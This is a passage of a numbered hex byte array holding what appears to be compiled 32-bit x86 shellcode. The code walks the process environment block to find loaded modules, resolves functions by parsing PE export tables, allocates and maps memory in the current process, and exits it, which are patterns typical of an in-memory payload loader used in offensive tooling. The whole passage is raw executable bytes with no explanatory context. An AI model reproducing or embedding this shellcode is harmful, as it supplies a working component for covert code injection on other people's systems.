57 0x83, 0x7d, 0xc8, 0x00, 0x74, 0x06, 0x83, 0x7d, 0xc4, 0x00, 0x75, 0x0a,
58 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x8d, 0x07, 0x00, 0x00, 0x8b, 0x45,
59 0x08, 0x8b, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7,
60 0x44, 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0xc7,
61 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0xff, 0xd0, 0x83,
62 0xec, 0x10, 0x89, 0x45, 0xc0, 0x83, 0x7d, 0xc0, 0x00, 0x75, 0x27, 0x8b,
63 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75,
64 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xc4, 0xff,
65 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0x35, 0x07,
66 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b,
67 0x45, 0x08, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc0, 0x89, 0x04, 0x24,
68 0xe8, 0x61, 0x51, 0x00, 0x00, 0x8b, 0x45, 0xc0, 0x89, 0x45, 0x08, 0xc7,
69 0x44, 0x24, 0x08, 0x20, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x00,
70 0x00, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24,
71 0xe8, 0x0f, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x04, 0x02,
72 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x85, 0x9e, 0x00, 0x00, 0x00, 0x8b,
73 0x45, 0x08, 0x05, 0x10, 0x02, 0x00, 0x00, 0x89, 0x45, 0xbc, 0x8b, 0x45,
74 0x08, 0x8b, 0x00, 0x8d, 0x88, 0xf0, 0xfd, 0xff, 0xff, 0x8b, 0x45, 0x08,
75 0x8d, 0x58, 0x14, 0x8b, 0x45, 0x08, 0x8d, 0x50, 0x04, 0x89, 0x4c, 0x24,
76 0x0c, 0x8b, 0x45, 0xbc, 0x89, 0x44, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
77 0x89, 0x14, 0x24, 0xe8, 0xae, 0x5b, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
78 0x50, 0x2c, 0x8b, 0x40, 0x28, 0x8b, 0x4d, 0x08, 0x81, 0xc1, 0x00, 0x0c,
79 0x00, 0x00, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x89, 0x0c,
80 0x24, 0xe8, 0x78, 0x58, 0x00, 0x00, 0x89, 0x45, 0xb0, 0x89, 0x55, 0xb4,
81 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x00,
82 0x0d, 0x00, 0x00, 0x89, 0xc3, 0x33, 0x5d, 0xb0, 0x89, 0x9d, 0x60, 0xfe,
83 0xff, 0xff, 0x89, 0xd0, 0x33, 0x45, 0xb4, 0x89, 0x85, 0x64, 0xfe, 0xff,
84 0xff, 0x8b, 0x8d, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x9d, 0x64, 0xfe, 0xff,
85 0xff, 0x89, 0xd8, 0x09, 0xc8, 0x85, 0xc0, 0x0f, 0x85, 0xf3, 0x04, 0x00,
86 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45,
87 0x08, 0x8b, 0x50, 0x34, 0x8b, 0x40, 0x30, 0x89, 0x4c, 0x24, 0x0c, 0x89,
88 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54, 0x24, 0x08, 0x8b,
89 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x2c, 0x0e, 0x00, 0x00, 0x8b, 0x55,
90 0x08, 0x89, 0x42, 0x30, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x30, 0x85, 0xc0,
91 0x75, 0x0a, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9, 0xff, 0x05, 0x00, 0x00,
92 0x8b, 0x45, 0x08, 0x05, 0x14, 0x02, 0x00, 0x00, 0x89, 0x45, 0xdc, 0xc7,
93 0x45, 0xe4, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x1c, 0x8b, 0x55, 0xdc, 0x8b,
94 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x8d, 0x8d, 0x74, 0xfe, 0xff,
95 0xff, 0x8b, 0x55, 0xe4, 0x01, 0xca, 0x88, 0x02, 0x83, 0x45, 0xe4, 0x01,
96 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84,
97 0xc0, 0x74, 0x18, 0x8b, 0x55, 0xdc, 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0x0f,
98 0xb6, 0x00, 0x3c, 0x3b, 0x74, 0x09, 0x81, 0x7d, 0xe4, 0x03, 0x01, 0x00,
99 0x00, 0x76, 0xbd, 0x83, 0x7d, 0xe4, 0x00, 0x74, 0x2e, 0x8b, 0x45, 0xe4,
100 0x83, 0xc0, 0x01, 0x01, 0x45, 0xdc, 0x8d, 0x95, 0x74, 0xfe, 0xff, 0xff,
101 0x8b, 0x45, 0xe4, 0x01, 0xd0, 0xc6, 0x00, 0x00, 0x8d, 0x85, 0x74, 0xfe,
102 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
103 0xe8, 0xeb, 0x08, 0x00, 0x00, 0xeb, 0x80, 0x90, 0xc7, 0x45, 0xe4, 0x01,
104 0x00, 0x00, 0x00, 0xe9, 0x96, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
105 0x48, 0x28, 0x8b, 0x58, 0x2c, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83,
106 0xc2, 0x06, 0x8d, 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0x4c,
107 0x24, 0x0c, 0x89, 0x5c, 0x24, 0x10, 0x89, 0x44, 0x24, 0x04, 0x89, 0x54,
108 0x24, 0x08, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x45, 0x0d, 0x00,
109 0x00, 0x8b, 0x55, 0x08, 0x8b, 0x4d, 0xe4, 0x83, 0xc1, 0x0c, 0x89, 0x04,
110 0x8a, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x0c, 0x8b, 0x04,
111 0x90, 0x85, 0xc0, 0x75, 0x41, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x7c, 0x01,
112 0x00, 0x00, 0x8b, 0x80, 0x78, 0x01, 0x00, 0x00, 0x89, 0x45, 0xd0, 0x89,
113 0x55, 0xd4, 0x8b, 0x45, 0x08, 0x8b, 0x55, 0xe4, 0x83, 0xc2, 0x06, 0x8d,
114 0x14, 0xd0, 0x8b, 0x02, 0x8b, 0x52, 0x04, 0x89, 0xc3, 0x33, 0x5d, 0xd0,
115 0x89, 0xde, 0x89, 0xd0, 0x33, 0x45, 0xd4, 0x89, 0xc7, 0x89, 0xf8, 0x09,
116 0xf0, 0x85, 0xc0, 0x0f, 0x85, 0x86, 0x03, 0x00, 0x00, 0x90, 0x83, 0x45,
117 0xe4, 0x01, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x10, 0x02, 0x00, 0x00, 0x39,
118 0x45, 0xe4, 0x0f, 0x82, 0x58, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x8b,
119 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x75, 0x21, 0x8b, 0x45,
120 0x08, 0x89, 0x04, 0x24, 0xe8, 0x5c, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x0f,
121 0x84, 0x51, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d,
122 0x00, 0x00, 0x89, 0x45, 0xe0, 0xeb, 0x2b, 0x8b, 0x45, 0x08, 0x8b, 0x80,
123 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x03, 0x0f, 0x84, 0x34, 0x03, 0x00,
124 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8,
125 0x01, 0x75, 0x0b, 0x8b, 0x45, 0x08, 0x05, 0x30, 0x0d, 0x00, 0x00, 0x89,
126 0x45, 0xe0, 0xc7, 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44,
127 0x24, 0x08, 0x00, 0x30, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0xa4, 0x0f,
128 0x00, 0x00, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc,
129 0xff, 0xd0, 0x83, 0xec, 0x10, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0xba,
130 0x00, 0x00, 0x00, 0x00, 0x8b, 0x4d, 0x08, 0x89, 0x81, 0xf8, 0x01, 0x00,
131 0x00, 0x89, 0x91, 0xfc, 0x01, 0x00, 0x00, 0x83, 0x7d, 0xd8, 0x00, 0x75,
132 0x27, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8,
133 0x02, 0x75, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
134 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0xff, 0xff, 0xff, 0xff, 0xe9,
135 0xf7, 0x03, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
136 0x00, 0x83, 0xf8, 0x01, 0x74, 0x72, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
137 0xe8, 0x82, 0x47, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d, 0xac, 0x00,
138 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00, 0x00, 0x83,
139 0xf8, 0x02, 0x0f, 0x84, 0x7c, 0x02, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89,
140 0x04, 0x24, 0xe8, 0xa2, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac, 0x83, 0x7d,
141 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44, 0x05, 0x00,
142 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x59, 0x02, 0x00, 0x00, 0x8b, 0x45,
143 0x08, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x49, 0x00, 0x00, 0x89, 0x45, 0xac,
144 0x83, 0x7d, 0xac, 0x00, 0x75, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x44,
145 0x05, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x84, 0x36, 0x02, 0x00, 0x00,
146 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x01, 0x0f, 0x84, 0x5b,
147 0x01, 0x00, 0x00, 0xc7, 0x85, 0x78, 0xff, 0xff, 0xff, 0x00, 0x00, 0x00,
148 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x80, 0x24, 0x05, 0x00, 0x00, 0x05, 0x2f,
149 0x15, 0x00, 0x00, 0x25, 0x00, 0xf0, 0xff, 0xff, 0x89, 0x85, 0x70, 0xfe,
150 0xff, 0xff, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24,
151 0x14, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00, 0x30, 0x00,
152 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7,
153 0x44, 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x78, 0xff, 0xff,
154 0xff, 0x89, 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff,
155 0xe8, 0x8b, 0x53, 0x00, 0x00, 0x89, 0x45, 0xa8, 0x83, 0x7d, 0xa8, 0x00,
156 0x0f, 0x88, 0xbb, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
157 0xc7, 0x44, 0x24, 0x08, 0x30, 0x05, 0x00, 0x00, 0x8b, 0x55, 0xe0, 0x89,
158 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x23, 0x4d, 0x00, 0x00, 0x8b,
159 0x45, 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x03, 0x74, 0x0f, 0x8b, 0x45,
160 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x04, 0x0f, 0x85, 0x81, 0x00, 0x00,
161 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x90, 0x04, 0x01, 0x00, 0x00, 0x8b, 0x45,
162 0xe0, 0x8b, 0x98, 0x20, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x05, 0x28,
163 0x05, 0x00, 0x00, 0x89, 0x85, 0x60, 0xfe, 0xff, 0xff, 0x8b, 0x45, 0xe0,
164 0x8b, 0x88, 0x24, 0x05, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff,
165 0x8d, 0xb8, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x40, 0x08,
166 0x83, 0xe8, 0x01, 0x80, 0xcc, 0x01, 0x0f, 0xb7, 0xc0, 0x8d, 0x75, 0x9c,
167 0x89, 0x74, 0x24, 0x14, 0x89, 0x5c, 0x24, 0x10, 0x8b, 0xb5, 0x60, 0xfe,
168 0xff, 0xff, 0x89, 0x74, 0x24, 0x0c, 0x89, 0x4c, 0x24, 0x08, 0x89, 0x7c,
169 0x24, 0x04, 0x89, 0x04, 0x24, 0xff, 0xd2, 0x83, 0xec, 0x18, 0x89, 0x45,
170 0xa4, 0x83, 0x7d, 0xa4, 0x00, 0x0f, 0x85, 0x11, 0x01, 0x00, 0x00, 0x8b,
171 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x45, 0xe0, 0xeb, 0x34, 0x8b, 0x45,
172 0xe0, 0x8b, 0x40, 0x08, 0x83, 0xf8, 0x02, 0x75, 0x29, 0x8b, 0x85, 0x78,
173 0xff, 0xff, 0xff, 0x8d, 0x90, 0x28, 0x05, 0x00, 0x00, 0x8b, 0x45, 0xe0,
174 0x05, 0x28, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24,
175 0xe8, 0xbd, 0x49, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89,
176 0x45, 0xe0, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x03, 0x74, 0x0a,
177 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x04, 0x75, 0x17, 0x8b, 0x45,
178 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8,
179 0xd0, 0x1d, 0x00, 0x00, 0xe9, 0xab, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xe0,
180 0x8b, 0x00, 0x83, 0xf8, 0x01, 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00,
181 0x83, 0xf8, 0x02, 0x75, 0x53, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
182 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45,
183 0x08, 0x89, 0x04, 0x24, 0xe8, 0xcc, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
184 0x1c, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x8b,
185 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
186 0xe8, 0xbe, 0x15, 0x00, 0x00, 0x8d, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89,
187 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x9f, 0x1b,
188 0x00, 0x00, 0xeb, 0x44, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x05,
189 0x74, 0x0a, 0x8b, 0x45, 0xe0, 0x8b, 0x00, 0x83, 0xf8, 0x06, 0x75, 0x2f,
190 0x8b, 0x45, 0xe0, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04,
191 0x24, 0xe8, 0x1c, 0x34, 0x00, 0x00, 0xeb, 0x1c, 0x90, 0xeb, 0x19, 0x90,
192 0xeb, 0x16, 0x90, 0xeb, 0x13, 0x90, 0xeb, 0x10, 0x90, 0xeb, 0x0d, 0x90,
193 0xeb, 0x0a, 0x90, 0xeb, 0x07, 0x90, 0xeb, 0x04, 0x90, 0xeb, 0x01, 0x90,
194 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83, 0xf8, 0x02,
195 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xf4, 0x08, 0x00, 0x00, 0x83,
196 0xf8, 0x03, 0x0f, 0x85, 0x84, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
197 0x80, 0x30, 0x0d, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x77, 0x8b, 0x45, 0x08,
198 0x8b, 0x90, 0x2c, 0x0d, 0x00, 0x00, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00,
199 0x89, 0xc2, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x30, 0x0d, 0x00, 0x00, 0x89,
200 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x89,
201 0x04, 0x24, 0xe8, 0xf5, 0x4a, 0x00, 0x00, 0xc7, 0x85, 0x70, 0xfe, 0xff,
202 0xff, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8d, 0x90, 0x30, 0x0d,
203 0x00, 0x00, 0x8b, 0x45, 0xd8, 0x89, 0x44, 0x24, 0x10, 0xc7, 0x44, 0x24,
204 0x0c, 0x00, 0x80, 0x00, 0x00, 0x8d, 0x85, 0x70, 0xfe, 0xff, 0xff, 0x89,
205 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff,
206 0xff, 0xff, 0xe8, 0x40, 0x51, 0x00, 0x00, 0x8b, 0x45, 0x08, 0xc7, 0x80,
207 0x30, 0x0d, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x8b,
208 0x80, 0x00, 0x02, 0x00, 0x00, 0x83, 0xf8, 0x02, 0x0f, 0x94, 0xc0, 0x0f,
209 0xb6, 0xc0, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0x08, 0x8b, 0x00, 0x89, 0x44,
210 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
211 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7b, 0x4a, 0x00, 0x00, 0x8b, 0x45, 0x08,
212 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8, 0x01, 0x00, 0x00,
213 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04,
214 0x00, 0x00, 0x00, 0x00, 0x89, 0x04, 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0,
215 0x83, 0xec, 0x0c, 0xc7, 0x44, 0x24, 0x08, 0x00, 0xc0, 0x00, 0x00, 0xc7,
216 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x89, 0x04,
217 0x24, 0x8b, 0x45, 0xc8, 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x83, 0x7d, 0xa0,
218 0x00, 0x74, 0x0f, 0xc7, 0x04, 0x24, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
219 0xc4, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x8d,
220 0x65, 0xf4, 0x5b, 0x5e, 0x5f, 0x5d, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec,
221 0x28, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x48, 0xc7, 0x44, 0x24, 0x14, 0x00,
222 0x01, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x89, 0x54, 0x24, 0x10, 0xc7, 0x44,
223 0x24, 0x0c, 0xff, 0xff, 0xff, 0xff, 0x8b, 0x55, 0x0c, 0x89, 0x54, 0x24,
224 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x04, 0x24,
225 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x18, 0xc9, 0xc3, 0x55,
226 0x89, 0xe5, 0x83, 0xec, 0x38, 0xc7, 0x45, 0xf0, 0x00, 0x00, 0x00, 0x00,
227 0xc7, 0x45, 0xdc, 0x18, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x64, 0x8b,
228 0x00, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x30, 0x89, 0x45,
229 0xec, 0x8b, 0x45, 0xec, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45,
230 0xe8, 0x8b, 0x40, 0x0c, 0x89, 0x45, 0xf4, 0xeb, 0x40, 0x8b, 0x45, 0xf4,
231 0x8b, 0x40, 0x18, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xe4, 0x3b, 0x45, 0x0c,
232 0x74, 0x26, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45,
233 0x14, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x45, 0xe4, 0x89, 0x44, 0x24, 0x04,
234 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x68, 0x00, 0x00, 0x00, 0x89,
235 0x45, 0xf0, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xf4, 0x8b, 0x00, 0x89, 0x45,
236 0xf4, 0x8b, 0x45, 0xf4, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x06, 0x83,
237 0x7d, 0xf0, 0x00, 0x74, 0xb0, 0x83, 0x7d, 0xf0, 0x00, 0x75, 0x3f, 0x8b,
238 0x45, 0x10, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24,
239 0xe8, 0x8b, 0x02, 0x00, 0x00, 0x89, 0x45, 0xe0, 0x83, 0x7d, 0xe0, 0x00,
240 0x74, 0x1d, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x34, 0x8b, 0x55, 0x14, 0x89,
241 0x54, 0x24, 0x04, 0x8b, 0x55, 0xe0, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83,
242 0xec, 0x08, 0x89, 0x45, 0xf0, 0xeb, 0x07, 0xc7, 0x45, 0xf0, 0x00, 0x00,
243 0x00, 0x00, 0x8b, 0x45, 0xf0, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x81, 0xec,
244 0xd8, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x83,
245 0x7d, 0x0c, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x37,
246 0x02, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x89, 0x45, 0xe8, 0x8b, 0x45, 0xe8,
247 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
248 0xe4, 0x8b, 0x45, 0xe4, 0x83, 0xc0, 0x78, 0x89, 0x45, 0xe0, 0x8b, 0x45,
249 0xe0, 0x8b, 0x00, 0x89, 0x45, 0xdc, 0x83, 0x7d, 0xdc, 0x00, 0x75, 0x0a,
250 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0x00, 0x02, 0x00, 0x00, 0x8b, 0x55,
251 0x0c, 0x8b, 0x45, 0xdc, 0x01, 0xd0, 0x89, 0x45, 0xd8, 0x8b, 0x45, 0xd8,
252 0x8b, 0x50, 0x1c, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xd4, 0x8b,
253 0x45, 0xd8, 0x8b, 0x50, 0x20, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45,
254 0xd0, 0x8b, 0x45, 0xd8, 0x8b, 0x50, 0x24, 0x8b, 0x45, 0x0c, 0x01, 0xd0,
255 0x89, 0x45, 0xcc, 0x83, 0x7d, 0x10, 0x00, 0x0f, 0x84, 0x8b, 0x00, 0x00,
256 0x00, 0x8b, 0x45, 0xd8, 0x8b, 0x40, 0x18, 0x89, 0x45, 0xf0, 0x83, 0x7d,
257 0xf0, 0x00, 0x75, 0x0a, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xe9, 0xa8, 0x01,
258 0x00, 0x00, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff, 0xff, 0x3f, 0x8d, 0x14,
259 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xd0, 0x01, 0xd0, 0x8b, 0x10,
260 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89, 0x45, 0xc8, 0x8b, 0x45, 0x10, 0x89,
261 0x44, 0x24, 0x04, 0x8b, 0x45, 0xc8, 0x89, 0x04, 0x24, 0xe8, 0x6a, 0x49,
262 0x00, 0x00, 0x85, 0xc0, 0x75, 0x2c, 0x8b, 0x45, 0xf0, 0x05, 0xff, 0xff,
263 0xff, 0x7f, 0x8d, 0x14, 0x00, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x0f, 0xb7,
264 0x00, 0x0f, 0xb7, 0xc0, 0x8d, 0x14, 0x85, 0x00, 0x00, 0x00, 0x00, 0x8b,
265 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c, 0x01, 0xd0, 0x89,
266 0x45, 0xf4, 0x83, 0x6d, 0xf0, 0x01, 0x83, 0x7d, 0xf0, 0x00, 0x74, 0x29,
267 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x90, 0xeb, 0x21, 0x8b, 0x45, 0xd8, 0x8b,
268 0x50, 0x10, 0x8b, 0x45, 0x14, 0x29, 0xd0, 0x8d, 0x14, 0x85, 0x00, 0x00,
269 0x00, 0x00, 0x8b, 0x45, 0xd4, 0x01, 0xd0, 0x8b, 0x10, 0x8b, 0x45, 0x0c,
270 0x01, 0xd0, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0xf4, 0x3b, 0x45, 0xd8, 0x0f,
271 0x82, 0x06, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xe0, 0x8b, 0x50, 0x04, 0x8b,
272 0x45, 0xd8, 0x01, 0xd0, 0x39, 0x45, 0xf4, 0x0f, 0x83, 0xf2, 0x00, 0x00,
273 0x00, 0x8b, 0x45, 0xf4, 0x89, 0x45, 0xc4, 0xc7, 0x45, 0xec, 0x00, 0x00,
274 0x00, 0x00, 0xeb, 0x28, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0,
275 0x0f, 0xb6, 0x00, 0x8d, 0x4d, 0x84, 0x8b, 0x55, 0xec, 0x01, 0xca, 0x88,
276 0x02, 0x8b, 0x55, 0xc4, 0x8b, 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00,
277 0x3c, 0x2e, 0x74, 0x1b, 0x83, 0x45, 0xec, 0x01, 0x8b, 0x55, 0xc4, 0x8b,
278 0x45, 0xec, 0x01, 0xd0, 0x0f, 0xb6, 0x00, 0x84, 0xc0, 0x74, 0x09, 0x83,
279 0x7d, 0xec, 0x3b, 0x76, 0xc3, 0xeb, 0x01, 0x90, 0x8b, 0x45, 0xec, 0x83,
280 0xc0, 0x01, 0xc6, 0x44, 0x05, 0x84, 0x64, 0x8b, 0x45, 0xec, 0x83, 0xc0,
281 0x02, 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x03,
282 0xc6, 0x44, 0x05, 0x84, 0x6c, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x04, 0xc6,
283 0x44, 0x05, 0x84, 0x00, 0x8b, 0x45, 0xec, 0x83, 0xc0, 0x01, 0x01, 0x45,
